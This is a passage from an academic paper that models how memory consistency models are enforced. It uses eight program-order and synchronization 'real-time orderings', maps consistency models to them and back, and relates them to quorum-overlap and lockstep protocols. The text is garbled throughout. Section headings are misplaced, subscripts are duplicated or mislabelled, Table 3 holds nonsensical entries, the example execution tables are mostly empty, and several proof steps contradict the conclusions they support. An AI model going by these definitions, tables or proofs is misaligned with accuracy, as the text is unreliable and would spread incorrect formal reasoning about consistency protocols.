A process models a client of a KVS or a core of a multiprocessor. The ROB abstracts the core’s load-store queue or a software queue that a KVS must maintain to keep track of incoming requests. The memory system is modelled as a distributed system comprising a set of nodes, where each node contains a controller and a memory. The nodes model the private caches of the multiprocessor or the geo-replicated memory servers of the KVS. Finally the network of the memory system can be thought of as the Network-on-Chip or as the WAN.
We observe that protocols of real systems enforce various consistency models using two widgets: 1) the ROB that allows for the reordering of operations; and 2) the memory system which determines how a read or a write executes, i.e., how it propagates to each of the replicas. We propose two sets of mathematical rules to abstract protocols, one that can abstract the reorderings of the ROB and one that can abstract the propagation rules of the memory system.
Specifically, we model the ROB using four rules named program-order real-time orderings (prt-orderings). The \( \text{prt}_{\text{wr}} \) prt-ordering mandates that when write \( w \) precedes read \( r \) in a program execution, then \( r \) can begin executing in the memory system only after \( w \) has completed. Similarly, we define \( \text{prt}_{\text{rw}}, \text{prt}_{\text{rr}}, \text{prt}_{\text{wr}} \), for the rest of the combinations between reads and writes. To summarize, we model an ROB by specifying the subset of the four prt-orderings it enforces.
We model the memory system using four rules named synchronization real-time orderings (srt-orderings). The \( \text{srt}_{\text{wr}} \) srt-ordering mandates that if write \( w \) to object \( x \) completes before read \( r \) to object \( x \) in real time, then \( r \) must observe \( w \). Similarly, we define \( \text{srt}_{\text{rw}}, \text{srt}_{\text{rr}}, \text{srt}_{\text{wr}} \). To summarize we model a memory system by specifying the subset of the four srt-orderings it enforces.
We refer to prt-orderings and srt-orderings as real-time orderings (rt-orderings). The eight rt-orderings comprise our designer-centric intermediate abstraction of the protocol.
While the rt-orderings have been employed by other works in the past to model consistency models or protocols (§9), this work is the first to present a mapping from MCMs to the rt-orderings. That is, given any MCM, we provide the set of minimal rt-orderings that enforce it. Crucially, this mapping, along with relating the rt-orderings with protocol implementation techniques, pave the way for automating protocol design.
Using this mapping from MCMs to rt-orderings, we now revisit the questions we posed on Figure 1. Specifically, prt-orderings \( \text{prt}_{\text{wr}} \) and \( \text{prt}_{\text{rr}} \) and the srt-ordering \( \text{srt}_{\text{wr}} \) suffice to enforce the producer-consumer pattern (discussed in Section 5.4). Informally, \( \text{prt}_{\text{wr}} \) mandates that writes from the same process must be executed in the order intended by the program; \( \text{prt}_{\text{rr}} \) mandates the same for reads; \( \text{srt}_{\text{wr}} \) mandates that a read must be able to return the value of the latest completed write (from any process). To also enforce the IRIW pattern, \( \text{srt}_{\text{rr}} \) is required (discussed in Section 5.5). Informally, \( \text{srt}_{\text{rr}} \) mandates that if a read returns the value of write \( w \), then any later read must also be able to return the value of write \( w \).
**Contributions.** In summary, in this work we make the following contributions:
- We propose and formalize eight rt-orderings for mathematically modelling consistency enforcement protocols, serving as an intermediate abstraction between the MCM and the protocol implementation (§3).
- We create a mapping from MCMs to rt-orderings, specifying the minimal set of rt-orderings sufficient to enforce any MCM (§5) and vice versa, specifying the MCM enforced by any set of rt-orderings (§6).
- We informally map rt-orderings to protocol implementation techniques (§7).
2 Preliminaries
In this section, we first establish the system model, then we describe the notation we will use throughout the paper and finally we discuss how executions are modeled.
2.1 System Model
Figure 2 illustrates our system model. Specifically, there is a set of P processes, each of which executes a program and there is a protocol which enforces the MCM. The protocol is comprised of a set of reorder buffers (ROBs) and the memory system. The memory system stores a set X of shared objects, each of a unique name and value. A memory operation (or simply operation) can be either a read or a write of an object. A read returns a value and a write overwrites the value of the object and returns an ack.
ROBs. The ROBs are used to facilitate communication between the processes and the protocol. There are three events in the lifetime of an operation within the ROB: issuing, begin and completion. Specifically, we write that a process “issues an operation”, when the operation is first inserted in the ROB. A process pushes operations in the ROB in the order that they are encountered within its program. We refer to this order as the program order. Furthermore, we write that “an operation begins” when the memory system begins executing the operation. In this case the memory system marks the operation’s ROB entry as begun. Similarly, we write that “an operation completes” when the memory system has finished executing the operation. In this case, the memory system marks the operation’s ROB entry as completed (and writes back the result if it is a read).
Notably, a process can use the value returned by a read, as soon as the read is marked completed by the memory system, irrespective of whether preceding operations are completed. An operation is removed from the ROB, if all three conditions hold: 1) it is the oldest operation, 2) it is completed and 3) the process has consumed its value, if it is a read.
Memory system. We model the memory system as a distributed system comprised of a set of nodes, where each node contains a controller and a memory. Furthermore, each node is connected to one ROB, from which it reads the operations that must be executed. The controller of each node is responsible for the execution of the operations. The memory of each node stores every object in X.
2.2 Notation
The notation used throughout this paper is the one used by Alglave et al. [2]. We repeat it here for completeness. The notation is based on relations. Specifically, we will denote the transitive closure of r with r∗ and the composition of r1, r2 with r1;r2. We say that r is acyclic if its transitive closure is irreflexive and we denote by writing acyclic(r). Finally, we say that r is a partial order, when r is transitive and irreflexive.
We say that a partial order r is a total order over a set S, if for every x, y in S, it is that (x, y) ∈ r ∨ (y, x) ∈ r.
We use small letters to refer to memory operations (e.g., a, b, c etc.). In figures that show executions (e.g., Figure 3), we denote a write with Wx = val where x is the object to be written and val is the new value. Similarly, reads are represented as Rx = val, where val is the value returned. When required relations between operations are denoted with red arrows in figures.
2.3 Modelling executions
To model executions, we use the framework created by Alglave et al. [2], introducing minor changes where necessary. Specifically, we model an execution as a tuple(M, po, rf, hb, RL). M is the set of memory operations included in the execution, po, rf and hb are relations over the operations and RL is a set of relations rl over the operations.
Execution relations (po, rf, hb and rl). The program order po relation is a total order over the operations issued by a single process, specifying the order in which memory operations are ordered in the program executed by the process. Operations are issued by a process in this order. Only operations from the same process are ordered. For two operations a, b from process i ∈ P, if a is issued before b then (a, b) ∈ po.
The reads-from rf relation contains a pair for each read operation in M, relating it with a write on the same object. For the pair (a, b) ∈ rf, it must be that a is a read that returns the value created by the write b, i.e., a reads-from b.
The happens-before hb relation is a partial order over all operations, specifying the real-time relation of operations. Specifically, for two operations a, b, if (a, b) ∈ hb, then that means that a completes before b begins.
Finally, the read-legal rl relation is a total order over all operations, with the restriction that acyclic(rl ∪ rf). Given the rf of an execution E, it is often possible to construct more than one rl. We associate each execution E, with a set RL which contains every rl that can be constructed from E. For each rl ∈ RL, we derive the following relations.
Relations derived from rl (ws, fr, syn). The write-serialization ws relation is a total order of writes to the same object that can be derived from rl, such that ws ⊆ rl. Intuitively, ws captures the order in which writes to the same object serialize.
The from-reads fr relation connects a read to writes from the same object that precede the read in rl. Specifically, for every read a and a write b to the same object where (a, b) ∈ rl, then (a, b) ∈ fr. It follows that fr is transitive and fr ⊆ rl.
Finally, the synchronization syn relation combines the rf, fr and ws relations. Specifically, syn is a partial order over operations on the same object defined as the transitive closure of the union of rf, ws and fr, i.e., syn ≜ (rf ∪ ws ∪ fr)∗.
We write \( po \) srt-orderings: 3.2 Synchronization Real-time Orderings
four prt-orderings are enforced then it follows that \( po \) is also in one of the \( po\)-type relations. I.e.,
\[
po \triangleq po_{ww} \cup po_{wr} \cup po_{rf} \cup po_{rw}
\]
Similarly, we define \( syn_{wr} \) and \( syn_{rr} \). Note that we do not need to define \( syn_{ww} \) and \( syn_{rr} \), because they would be the same as \( ws \) and \( fr \), respectively. We write \( syn \) as a placeholder for \( ws, syn_{wr}, syn_{rr}, fr \). We note that every pair in \( syn \) is also in one of the \( syn\)-type relations and that \( rf \) is a subset of \( syn_{wr} \).
\[
syn \triangleq ws \cup syn_{wr} \cup syn_{rr} \cup fr
\]
Finally, in the same spirit, we define the \( hb\)-type relations: \( hb_{ww}, hb_{wr}, hb_{rr}, hb_{rw} \).
3 Real-time orderings
In this section we introduce and formally define the real-time orderings (rt-orderings), through which we model the protocol. There are two types of rt-orderings: the program-order real-time orderings (prt-orderings) through which we model the operation of the ROB and the synchronization real-time orderings (srt-orderings), through which we model the operation of the memory system. Table 1 provides the definition of each of the eight real-time orderings. Below we first describe the prt-orderings and then the srt-orderings.
3.1 Program-order Real-time Orderings
An execution \( E(M, po, rf, hb, RL) \) is said to enforce the \( prt_{wr} \) if:
\[
\forall w, r \in M \text{ s.t. } (w, r) \in po_{wr} \rightarrow (w, r) \in hb_{wr}
\]
Plainly, a read \( r \) cannot begin before all writes that precede it in program order have completed. Table 1 extends this definition to write-write, read-read and read-write pairs. When all four prt-orderings are enforced then it follows that \( po \subseteq hb \).
3.2 Synchronization Real-time Orderings
The synchronization real-time orderings (srt-orderings) are constraints over operations to the same object. There are four srt-orderings: \( srt_{ww}, srt_{wr}, srt_{rr}, srt_{rw} \). An execution \( E(M, po, rf, hb, RL) \) enforces the srt-ordering \( srt_{wr} \) if there exists \( rl \in RL \) such that:
\[
acyclic(hb_{wr} \cup syn)
\]
In other words the \( srt_{wr} \) mandates that for a write \( a \) and a read \( b \) if \((a, b) \in hb_{wr}\), then it must be that \((b, a) \notin syn\).
Table 1: The condition required to enforce each rt-ordering.
<table>
<thead>
<tr>
<th>prt-orderings</th>
<th>srt-orderings</th>
</tr>
</thead>
<tbody>
<tr>
<td>( prt_{ww} )</td>
<td>( srt_{ww} ), ( acyclic(hb_{ww} \cup syn) )</td>
</tr>
<tr>
<td>( prt_{wr} )</td>
<td>( srt_{wr} ), ( acyclic(hb_{wr} \cup syn) )</td>
</tr>
<tr>
<td>( prt_{rr} )</td>
<td>( srt_{rr} ), ( acyclic(hb_{rr} \cup syn) )</td>
</tr>
<tr>
<td>( prt_{rw} )</td>
<td>( srt_{rw} ), ( acyclic(hb_{rw} \cup syn) )</td>
</tr>
</tbody>
</table>
Table 2: The types of po, syn and hb relations
<table>
<thead>
<tr>
<th>po-type</th>
<th>syn-type</th>
<th>hb-type</th>
</tr>
</thead>
<tbody>
<tr>
<td>( po_{ww} )</td>
<td>( ws ), ( syn )</td>
<td>( hb_{ww} ), ( hb )</td>
</tr>
<tr>
<td>( po_{wr} )</td>
<td>( syn_{wr} )</td>
<td>( hb_{wr} ), ( hb )</td>
</tr>
<tr>
<td>( po_{rr} )</td>
<td>( syn_{rr} )</td>
<td>( hb_{rr} ), ( hb )</td>
</tr>
<tr>
<td>( po_{rw} )</td>
<td>( fr ), ( syn )</td>
<td>( hb_{rw} ), ( hb )</td>
</tr>
</tbody>
</table>
In order to create a mapping from memory consistency models (MCMs) to the rt-orderings we need to establish a formalism for the MCMs. In this section, we use the formalism of Alglave et al. [2] to describe synchronization patterns (sync-pats) and assert that any MCM \( CM \) is defined as a set of sync-pats \( S_{CM} \). An execution enforces \( CM \) if it enforces every sync-pat in \( S_{CM} \). Below we define what a sync-pat is and what its enforcement entails.
4 Memory consistency models (MCMs)
A sync-pat is a path between two operations to the same object. The path can be constructed through any composition of \( po\)-type and \( syn\)-type relations, with the only restriction being that at least one \( po\)-type must be included (explained in the remarks below). Table 2 describes which relations are denoted \( po\)-type and \( syn\)-type.
For example, consider the sync-pat \( s \) that consists of a \( po_{wr} \) relation, then an \( fr \) relation and then a \( po_{wr} \) (depicted in Figure 3a). We can describe \( s \) by composing the three relations as follows:
\[
s \triangleq po_{wr}; fr; po_{wr}
\]
Initially \( x = 0, y = 0 \)
\[\begin{array}{c|c|c|c}
& P1 & P2 & P3 \\
\hline
a: & Wx=1 & & \\
b: & Ry=1 & & \\
\hline
\end{array}\]
\[\begin{array}{c|c|c|c}
& P1 & P2 & P3 \\
\hline
a: & Wx=1 & & \\
b: & Wy=1 & & \\
c: & & & \\
d: & Rx=1 & & \\
\end{array}\]
\[\begin{array}{c|c|c|c}
& P1 & P2 & P3 \\
\hline
a: & Rx=1 & & \\
b: & Ry=1 & & \\
c: & & & \\
d: & Wx=2 & & \\
\end{array}\]
Figure 3: Four examples of sync-pats
Given an execution \( E(M, po, rf, hb, RL) \), we assert that \( E \) enforces \( s \) if there exists \( rl \in RL \) from which we can derive a \( syn \) such that:
\[\text{acyclic}(s \cup \text{syn})\]
In other words, a sync-pat that starts from operation \( a \) and ends on operation \( b \) is said to be enforced if \( (b, a) \notin s \).
Figure 3 depicts four sync-pats to serve as examples. In the execution of Figure 3a, the sync-pat occurs between operations \( a \) and \( d \). In this instance, \( s \) is enforced because \( d \) returns the value created by \( a \). If \( d \) were to return 0, that would mean that there is a \( syn \) relation between \( d \) and \( a \) and thus \( s \) is not enforced.
Remarks. Note the following two remarks. First, we use \( \text{syn} \) rather than \( rl \) to test whether a sync-pat is enforced. This is because the sync-pat is a path between two operations to the same object, but \( rl \) is a total order of all operations across all objects. Second, note that a sync-pat must have at least one \( \text{po-type} \), because otherwise it would just be a composition of \( \text{syn-type} \) relations. Any such composition is a subset of \( \text{syn} \), which means that the execution enforces it by definition.
Consistency models. An MCM \( CM_i \) is defined by asserting that a set of sync-pats \( SCM \) must be enforced. Plainly, an execution enforces \( CM_i \) iff it enforces every \( s \in SCM \). As an example, assume that \( CM_i \) is defined through the four sync-pats depicted in Figure 3, which are formalized as follows:
\[
s_1 \triangleq po_{wr}; fr; po_{wr}, s_2 \triangleq po_{wr}; rf; po_{wr}, s_3 \triangleq po_{rw}; ws; po_{wr}, s_4 \triangleq po_{rr}; sy_n_{rr}; po_{wr}.
\]
We define \( CM_i \) to be the following rule:
\[\text{acyclic}(s_1 \cup \text{syn}) \land \text{acyclic}(s_2 \cup \text{syn}) \land \text{acyclic}(s_3 \cup \text{syn}) \land \text{acyclic}(s_4 \cup \text{syn})\]
5 From MCMs to rt-orderings
In this section, we provide a mapping from MCMs to rt-orderings. Specifically, given an MCM \( CM_i \) that is specified through a set \( SCM \) of sync-pats, we automatically infer a set of rt-orderings, sufficient to enforce \( CM_i \). In the rest of this section, we first differentiate between regular and irregular sync-pats (§5.1). Then we provide the mapping (§5.2), prove its correctness for an example sync-pat (§5.3), extend the proof to all regular sync-pats (§5.4) and finally extend the proof to irregular sync-pats (§5.5). In Table 3, we provide the mapping of 16 sync-pats to rt-orderings.
5.1 Regular and irregular sync-pats
We first categorize sync-pats into two classes: regular and irregular. A regular sync-pat is 1) composed by alternating \( \text{po-type} \) and \( \text{syn-type} \) relations and 2) starts and ends on a \( \text{po-type} \). Thus, any regular sync-pat \( s \), is of the following form:
\[s \triangleq \text{po-type}; \text{syn-type}; \text{po-type}; \ldots \text{syn-type}; \text{po-type}\]
Any sync-pat that does not conform to regularity rules is irregular. The distinction between regular and irregular sync-pats will aid in the presentation of the mapping from sync-pats to rt-orderings. Specifically, we will first create a mapping from a regular sync-pat to the sufficient rt-orderings to enforce it. Then, in order to use the same mapping for irregular sync-pats, we will show that for every irregular sync-pat \( s_i \), there exists a regular sync-pat \( s_r \), such that enforcing \( s_r \) is sufficient to enforce \( s_i \).
5.2 The mapping
We assert the following three conditions to enforce any regular sync-pat, assuming that an operation can be of type \( m \) or \( n \) where \( m, n \in \{\text{read}, \text{write}\} \):
- **Cond-1**: For every \( \text{po-type} \) relation \( po_{mn} \) found in \( s \), the corresponding \( \text{prt-ordering} \) \( pr_{tmn} \) must be enforced. Plainly any \( \text{po-type} \) relation must also be an \( \text{hb} \) relation.
- **Cond-2**: For every \( \text{syn-type} \) relation \( sy_{mn} \), if it is not an \( \text{rf} \), then the reverse \( \text{srt-ordering} \) \( srt_{mn} \) must be enforced.
- **Cond-3**: If the first operation in \( s \) is of type \( m \) and the last of type \( n \), the corresponding \( \text{srt-ordering} \) \( srt_{mn} \) must be enforced.
5.3 Proof for an example sync-pat
We will start by first proving that the three conditions are sufficient for the simple sync-pat, that is portrayed in Figure 3a. Then we will extend to any regular sync-pat. The simple sync-pat \( s \) is the following:
\[s \triangleq po_{wr}; fr; po_{wr} \]
For \( s \) the three conditions require the following rt-orderings:
- **Cond-1**: The \( pr_{wr} \) is required for both \( po_{wr} \) relations.
- **Cond-2**: The \( srt_{wr} \) for the \( fr \) (i.e., \( sy_{wr} \)) relation.
- **Cond-3**: The \( srt_{wr} \) because \( s \) starts with a write and ends on a read.
We will show that for any execution $E(M, po, rf, hb, RL)$, if $prt_{wr}$ is enforced and there exists $rl \in RL$ such that $srt_{wr}$ is enforced then for the syn that is derived from that $rl$ it holds that $acyclic(s \cup syn)$.
To prove this, we first establish a new relation named $begins$-$before$-$completes$ ($bbc$). For two operations $a, b$ we assert that if $b$ does not complete before $a$ begins (i.e., $(b, a) \notin hb$), then $a$ begins before $b$ completes (i.e., $(a, b) \in bbc$). We establish the following rule:
$$\forall a, d \in M \text{ s.t. } (a, d) \in (hb; bbc; hb) \rightarrow (a, d) \in hb$$
We sketch a proof for this rule using Figure 4a. Figure 4a illustrates this through four operations ($a, b, c, d$), each of which is associated with a timestamp ($ta, tb, tc, td$). Operation $b$ begins before $c$ completes (i.e., $(b, c) \in bbc$), while also $(a, b), (c, d) \in hb$. Therefore, $(a, d) \notin (hb; bbc; hb)$. Since $a$ completes before $b$ begins ($ta < tb$) and $b$ begins before $c$ completes ($tb < tc$), it follows that $a$ completes before $c$ completes ($ta < tc$). Because $c$ completes before $d$ begins ($tc < td$), it follows that $a$ completes before $d$ begins ($ta < td$). Therefore, $(a, d) \in hb$.
Figure 4b illustrates the counter-example, where $c$ completes before $b$ begins; in this case it is possible for $b$ to begin before $c$ completes.
Consider an execution $E(M, po, rf, hb, RL)$, for which there exists an $rl \in RL$ such that all three conditions we asserted are satisfied. Assume four operations $a, b, c, d \in M$ such that $(a, b) \in po_{wr} \land (b, c) \in syn_{wr} \land (c, d) \in po_{wr}$. This implies that $(a, d) \in s$. Let us now assume that $(a, d) \in (hb; bbc; hb)$ and thus $(a, d) \in hb$. Specifically, $(a, d) \in hb_{wr}$. This is illustrated in Figure 4a. From the cond-3 ($srt_{wr}$), we can assert that since $(a, d) \in hb_{wr}$, it follows that $(a, d) \notin syn$ and thus it must be that $acyclic(s \cup syn)$. Plainly, cond-3 ensures that $acyclic(s \cup syn)$ if the following condition holds:
$$\forall a, d \in M \text{ s.t. } (a, d) \in s \rightarrow (a, d) \in hb$$
Therefore it suffices to prove that cond-1 and cond-2 guarantee the above condition. We will do so by proving that $(a, d) \in hb$. $bbc$.
Finally, cond-1 ($prt_{wr}$) mandates that $po_{wr} \subseteq hb_{wr}$. Therefore, $(a, b), (c, d) \in hb$. We need only prove that $(b, c) \in bbc$. Let’s assume that $(b, c) \notin bbc$. It follows that $(c, b) \in hb$. Recall, that $b$ is a write and $c$ is a read. Cond-2 mandates that $srt_{wr}$ is enforced: since $(c, b) \in hb$ then $(b, c) \notin syn$. We have reached a contradiction, and therefore it must be that $(b, c) \in bbc$.
Figure 4b provides the counter example where $(b, c) \notin bbc$. In this case it cannot be that $(a, d) \in s$ because $(b, c) \in hb$ and therefore from cond-2 it follows that $(c, b) \in syn$. Plainly, the sync-pat $s$ will not occur here because $P1$’s read to $y$ will observe $P2$’s write to $y$.
As we have shown above, from cond-1 and cond-2 it follows that $(a, d) \notin hb$ and thus from cond-3 it follows that $(a, d) \notin syn$. Therefore the three conditions are sufficient to enforce $s$.
5.4 Extending to all regular sync-pats
Note the intuition behind the three conditions. Cond-1 ensures that every $po-type$ relation of the sync-pat is also an $hb$ relation. Similarly, cond-2 ensures that every $syn-type$ relation is also a $bbc$ relation. As a regular sync-pat is composed by alternating $po-type$ and $syn-type$ relations, enforcing cond-1 and cond-2 ensures that the sync-pat can be expressed as a composition of alternating $hb$ and $bbc$ relations.
As we saw $hb; bbc; hb \subseteq hb$. By induction we can extend this rule for any sequence of alternating $hb$ and $bbc$ relations. Specifically:
$$\forall a, b \in M \text{ s.t. } (a, b) \in hb; bbc; hb \rightarrow (a, b) \in hb$$
Therefore, cond-1 and cond-2 ensure that if $(a, b) \in s$ then $(a, b) \in hb$ for any regular sync-pat $s$. Finally, cond-3 ensures that the sync-pat is enforced, by ensuring that if $(a, b) \in hb$ then $(b, a) \notin syn$. This means that our three conditions can be used to enforce any regular sync-pat.
Examples – Table 3. Table 3 depicts the sufficient rt-orderings for 16 sync-pats. Specifically, each cell represents a distinct sync-pat between operations $a, b, c, d$. For instance, the highlighted cell where $a = Wx, b = Ry, c = Wy, d = Rx$, corresponds to the sync-pat of Figure 3a.
Cond-2 exception: rf. Recall that cond-2 is not required for $rf$ edges. This is because the purpose of cond-2 is to ensure that the $syn-type$ relation is also a $bbc$ relation. However, this is implied by the $rf$ as it is impossible for a read $r$ to read-from a write $w$ if $r$ completes before $w$ begins. Plainly:
$$\forall w, r \in M \text{ s.t. } (w, r) \in rf \rightarrow (w, r) \in bbc$$
Producer-consumer (Figure 1a). Let $spc$ be the producer-consumer sync-pat of Figure 1a (discussed in the Introduction). We assert that $spc \equiv po_{wr}; rf; po_{rr}$. To enforce $spc$, cond-1 requires prt-orderings $prt_{wr}, prt_{rr}$. cond-2 does not require any srt-ordering because the only $syn-type$ is an $rf$ and cond-3 requires the $srt_{wr}$.
5.5 Extending to irregular sync-pats
A sync-pat is deemed irregular if 1) it has consecutive $po-type$ relations or 2) it has consecutive $syn-type$ relations or 3) it does not start with a $po-type$ relation (i.e., starts with
Table 3: The mapping of 16 sync-pats to rt-orderings. Each cell represents a sync-pat of the form \( s \triangleq po\text{-type}; syn\text{-type}; po\text{-type} \), where the first po-type includes \((a, b), \) the syn-type includes \((b, c)\) and the second po-type includes \((c, d)\). The highlighted cell corresponds to Figure 3a.
\[
\begin{array}{|c|c|c|c|}
\hline
& c \rightarrow Wy & c \rightarrow Wy & c \rightarrow Ry & c \rightarrow Ry \\
\hline
a \rightarrow Wy & st_{uw}, st_{wr}, & st_{uw}, st_{wr}, & st_{tu}, st_{tr}, & st_{uw}, st_{tr}, \\
& pr_{tw}, & pr_{tw}, & pr_{tw}, & pr_{tw}, \\
\hline
a \rightarrow Wx & st_{uw}, st_{wr}, & st_{uw}, & st_{uw}, st_{tr}, & st_{uw}, st_{tr}, \\
& pr_{tw}, pr_{tw}, & pr_{tw}, & pr_{tw}, & pr_{tw}, \\
\hline
b \rightarrow Wx & st_{tu}, st_{tw}, & st_{uw}, & st_{uw}, st_{tr}, & st_{uw}, st_{tr}, \\
& pr_{tw}, pr_{tw}, & pr_{tw}, & pr_{tw}, & pr_{tw}, \\
\hline
b \rightarrow Rx & st_{tu}, st_{tw}, & st_{tu}, st_{tw}, & st_{tu}, st_{tw}, & st_{tu}, st_{tw}, \\
& pr_{tw}, pr_{tw}, & pr_{tw}, & pr_{tw}, & pr_{tw}, \\
\hline
a \rightarrow Rx & st_{tw}, st_{wu}, & st_{tu}, st_{tw}, & st_{tw}, st_{tu}, & st_{tw}, st_{tu}, \\
& pr_{tw}, pr_{tw}, & pr_{tw}, & pr_{tw}, & pr_{tw}, \\
\hline
b \rightarrow Rx & st_{tu}, st_{tw}, & st_{uw}, & st_{uw}, st_{tr}, & st_{uw}, st_{tr}, \\
& pr_{tw}, pr_{tw}, & pr_{tw}, & pr_{tw}, & pr_{tw}, \\
\hline
\end{array}
\]
\textit{syn-type} or 4) it does not end with a \textit{po-type} relation (i.e., ends with \textit{syn-type}). For each such sync-pat \( s \), we derive a sync-pat \( s' \) such that 1) \( s' \) is regular and 2) if \( s' \) is enforced then \( s \) must also be enforced.
\textbf{Consecutive po-type.} We start with sync-pats with consecutive \textit{po-type} relations. We use the insight that any composition of \textit{po-type} relations must be the subset of one of \( po_{wr}, po_{wr}, po_{rr}, po_{rr} \) relation. For instance \( po_{wr}, po_{wr}, po_{rr}, po_{rr} \) is a subset of \( po_{wr} \). Therefore, for any \( s \) that has consecutive \textit{po-type} relations, we derive a \( s' \) which replaces them with a single \textit{po-type} relation, such that \( s \subsetneq s' \) and we assert that enforcing \( s' \) is sufficient to also enforce \( s \). Below is an example of \( s \) and the derived \( s' \) using the insight that \( (po_{wr}; po_{rr}) \subsetneq po_{wr} \).
\[
\begin{align*}
\text{Assume now that } (a, c) & \in s, \ (b, c) \in s' \text{ and } (a, b) \in fr. \\
\text{Let us now prove that if } s' \text{ is enforced, } s \text{ is enforced too. } \\
\text{Assume } s' \text{ is enforced but } s \text{ is not. Therefore, } (c, b) \notin syn \\
\text{but } (c, a) \in syn. \text{ We know that } (a, b) \in fr \text{ and thus } (a, b) \in syn. \\
\text{By the transitivity property of syn we assert that since } \\
(c, a) \in syn \land (a, b) \in syn \text{ it must be that } (c, b) \in syn. \text{ This contradicts our assumption that } s' \text{ is enforced. Therefore enforcing } s' \text{ is sufficient to also enforce } s. \\
\textbf{End on syn-type.} Similarly, if } s \text{ ends on a } syn\text{-type relation, we remove it to derive } s'. \text{ Assume the following example. }
\end{align*}
\]
\[
\begin{align*}
\text{Assume now that } (a, c) & \in s, \ (a, b) \in s' \text{ and } (b, c) \in fr. \\
\text{Using the same proof as above, we can infer that if } s' \text{ is enforced then } (b, a) \notin syn \text{ and thus it follows that } (c, a) \notin syn. \\
\text{Therefore enforcing } s' \text{ is sufficient to also enforce } s. \\
\textbf{A combination of the above (IRIW – Figure 1b).} \text{ When a sync-pat falls into more than one of the above irregular categories, we combine the techniques discussed above. For instance, let } s_{iriw} \text{ be the IRIW sync-pat of Figure 1b (discussed in the Introduction).}
\end{align*}
\]
\[
\begin{align*}
\text{This is an irregular sync-pat, which both starts with a } syn\text{-type} \\
\text{and includes a composition of consecutive } syn\text{-type} \text{ relations.}
\end{align*}
\]
\[
\begin{align*}
\text{We use the rules above to derive } s'_{iriw} \triangleq po_{rr}, syn_{rr}, po_{rr} \text{ and assert that if } s'_{iriw} \text{ is enforced then } s_{iriw} \text{ is also enforced.}
\end{align*}
\]
\[
\begin{align*}
\text{To enforce } s'_{iriw} \text{ cond-}1 \text{ requires the prt-ordering } p_{tr}, \\
\text{cond-2 requires the srt-ordering } s_{tr}, \text{ which is also required by cond-3.}
\end{align*}
\]
\section{From rt-orderings to MCMs}
So far we have created a mapping from MCMs to rt-orderings, by establishing the sufficient rt-orderings to enforce any sync-pat. In this section, we use this result to obtain the reverse mapping from rt-orderings to MCMs, focusing our discussion solely on regular sync-pats, seeing as the enforcement of irregular sync-pats is done by mapping them to regular ones. To obtain the mapping from rt-orderings to sync-pats, we reverse each of the three conditions, assuming that an operation can be of type \( m \) or \( n \) where \( m, n \in \{\text{read, write}\} \). Specifically, given a protocol that enforces a set of prt-orderings \( R_p \) and a set of srt-orderings \( R_s \), a sync-pat \( s \) is enforced when it abides by the following conditions:
- **Cond-1’:** \( s \) can include a \textit{po-type} relation \( po_{mn} \) if \( p_{rmn} \in R_p \).
where each regular sync-pat
Example. To showcase how these conditions can be used in practice, let us specify the MCM $CM_i$ that is enforced by a protocol that enforces the rt-orderings $prt_{vw}, prt_{wr}, srt_{w}$ and $srt_{wr}$. To do so we must specify a set of sync-pats $SCM$ where each regular sync-pat $s \in SCM$ abides by the following rules:
- Any po-type relation in $s$ is either a $po_{wr}$ or a $po_{wr}$
- Any syn-type relation in $s$ is either a $syn_{wr}$ or a $syn_{wr}$ ($rf$ is included in $syn_{wr}$)
- $s$ must either start on a write and end on a read, or start on a read and end on a write.
Notably, the interplay amongst the rules can be used to further simplify them. For instance the third rule asserts that from the available srt-orderings $(srt_{w}$ and $srt_{wr}$) it follows that either the first operation must be a read and the last a write or the reverse. However, neither of the available po-types $(po_{wr}$ and $po_{wr})$ start with a read and since a regular sync-pat must start with a po-type relation, it cannot be that the first operation is a read. Consequently, the first operation can only be a write, and thus the last operation must be a read, to abide by the third rule.
Similarly, because a regular sync-pat, is a composition of alternating po-type and syn-type relations, it follows that the available po-type and syn-type relations can only be used if they can synergize. For instance, the $syn_{wr}$ cannot be used at all because neither of the available po-types $(po_{wr}$ and $po_{wr})$ starts from a read. Similarly, because the $syn_{wr}$ cannot be used, the $po_{wr}$ cannot be used before any syn-type, nor can it be used as the last relation because the sync-pat must end on a read.
Therefore the rules for a sync-pat $s \in SCM$ are simplified as follows:
- Any po-type relation in $s$ must be a $po_{wr}$
- Any syn-type relation in $s$ must be a $syn_{wr}$
- $s$ must start on a write and end on a read.
As a result any regular sync-pat $s \in SCM$ is a composition of alternating $po_{wr}$ ans $syn_{wr}$ relations. Below we list a few examples sync-pats in $SCM$
\[
\begin{align*}
s_1 & \triangleq po_{wr}; syn_{wr}; po_{wr} \\
s_2 & \triangleq po_{wr}; syn_{wr}; po_{wr}; syn_{wr}; po_{wr} \\
s_3 & \triangleq po_{wr}; syn_{wr}; po_{wr}; ... syn_{wr}; po_{wr}
\end{align*}
\]
Notably, enforcing the $prt_{vw}$ and $srt_{wr}$ are not contributing towards enforcing any $s \in SCM$.
7 From rt-orderings to Protocols
In previous sections we established the mappings between the sync-pats and the rt-orderings. In this section, we relate rt-orderings to some well-known protocol design techniques. We start with a brief discussion on the prt-orderings and then we focus on the srt-orderings.
7.1 Enforcing rt-orderings
Prt-orderings model the operation of the ROB specifying when the memory system can begin executing an operation. Upholding the prt-orderings is as simple as inspecting the state of the ROB. For instance, enforcing $prt_{wr}$ implies that the memory system cannot begin executing a read $r$ from process $p$, until every preceding write in the ROB is completed.
Srt-orderings models how the memory system executes reads and writes. Below we discuss two common techniques that can be used to enforce srt-orderings 1) overlap and 2) lockstep.
Overlap. The srt-ordering $srt_{mn}$ can be enforced simply by ensuring that operations of type $m$ must overlap with operations of type $n$ in a physical location. For instance, we can enforce $srt_{wr}$, by ensuring that a write is propagated to $x$ nodes and a read queries $y$ nodes, where $x + y > N$ and $N$ is the number of nodes. Alternatively, both types of operations can “meet” in some centralized physical location (e.g., the directory for multiprocessors). To ensure all four srt-orderings and thus linearizability, both reads and writes must query $y$ nodes to learn about completed operations and must broadcast their results to $x$ nodes. This is exactly how the multi-writer variant of ABD [14] operates.
Lockstep. Lockstep is a technique, where a memory system node first “grabs a lock” on the object before beginning an operation and releases it when the operation completes. Upon grabbing the lock, the node learns about the operation executed by the previous lock holder. The act of “grabbing the lock” is similar to getting a cache-line in $M$ or $S$ state in a coherence protocol [17], or becoming the leader of the next log entry in a state machine replication protocol, such as Paxos [11]. Notably, lockstep entails overlap as operations must meet in a physical location to exchange the lock, but it also precludes the operations from executing concurrently.
